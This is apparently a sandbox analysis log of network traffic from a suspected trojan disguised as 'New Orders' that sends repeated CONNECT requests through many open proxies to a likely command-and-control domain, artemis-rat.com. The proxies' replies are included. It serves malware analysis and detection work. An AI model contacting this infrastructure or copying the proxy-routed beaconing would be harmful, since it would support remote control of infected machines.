                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.035063982 CET202INHTTP/1.0 404 Not Found
                                                                                        Content-Length: 715
                                                                                        Content-Type: text/html
                                                                                        Date: Thu, 25 May 2023 23:15:50 GMT
                                                                                        Expires: Thu, 25 May 2023 23:15:50 GMT
                                                                                        Server: Mikrotik HttpProxy
                                                                                        Proxy-Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1114192.168.2.95324372.206.181.97649437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.121839046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1115192.168.2.953239109.238.12.15613657672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.125030994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1116192.168.2.953029117.160.250.16380817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.125979900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.840348005 CET221INHTTP/1.1 403 Access Denied
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Connection: close
                                                                                        Cache-Control: no-store
                                                                                        Content-Type: text/html
                                                                                        Content-Language: en
                                                                                        Content-Length: 43
                                                                                        Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                        Data Ascii: You are not allowed to access the document.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1117192.168.2.953247195.169.35.21431287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.126528978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.724415064 CET39INHTTP/1.0 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1118192.168.2.953325104.16.72.45807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.142019033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.296456099 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1119192.168.2.953328185.162.228.170807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.144083023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.298697948 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1120192.168.2.952439197.242.146.10931287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.144503117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.737880945 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1121192.168.2.952570148.72.209.174390277672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.144990921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.164287090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.164283991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.164129019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:08.165358067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:20.273129940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:32.275830030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:56.273344040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:44.273192883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1122192.168.2.95320446.209.54.11080807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.145447969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.600227118 CET19INHTTP/1.1 200 OK
                                                                                        Mar 11, 2024 16:18:57.140716076 CET202INHTTP/1.0 504 Gateway Timeout
                                                                                        Content-Length: 735
                                                                                        Content-Type: text/html
                                                                                        Date: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                        Expires: Sat, 02 Mar 2024 04:49:06 GMT
                                                                                        Server: Mikrotik HttpProxy
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1123192.168.2.952634162.214.102.195567557672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.145859957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1124192.168.2.953231103.153.135.10080837672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.145905972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.945214033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.104887962 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1125192.168.2.95328740.76.160.14390007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.147116899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1126192.168.2.95156464.227.108.25319087672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.149275064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1127192.168.2.95325498.162.25.2341457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.149462938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1128192.168.2.953251192.162.232.1510807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.152362108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1129192.168.2.952369107.173.255.18312347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.152888060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1130192.168.2.953236123.110.158.236807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.157047987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1131192.168.2.95084382.223.121.7249857672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.157741070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.222075939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1132192.168.2.953356104.27.12.22807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.169827938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.324681997 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1133192.168.2.95325031.134.151.40807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.170218945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1134192.168.2.95327845.88.90.19931287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.173149109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.961108923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.960978031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.773505926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.273303986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1135192.168.2.95325947.56.110.20489897672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.173700094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.487663984 CET309INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.16.1
                                                                                        Date: Mon, 11 Mar 2024 15:01:36 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 157
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1136192.168.2.95325293.157.248.108887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.173968077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1137192.168.2.95333345.60.186.208274887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.178284883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1138192.168.2.953319162.223.94.166807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.196504116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.888398886 CET113INHTTP/1.1 503 Service Temporarily Unavailable
                                                                                        Content-Type: text/html
                                                                                        Connection: close
                                                                                        Data Raw: 42 61 63 6b 65 6e 64 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65
                                                                                        Data Ascii: Backend not available


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1139192.168.2.952052192.111.135.17183027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.197446108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1140192.168.2.95087438.10.69.10990907672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.198931932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.111392021 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1141192.168.2.953282185.49.30.580817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.204725027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1142192.168.2.95330072.210.221.22341457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.204865932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
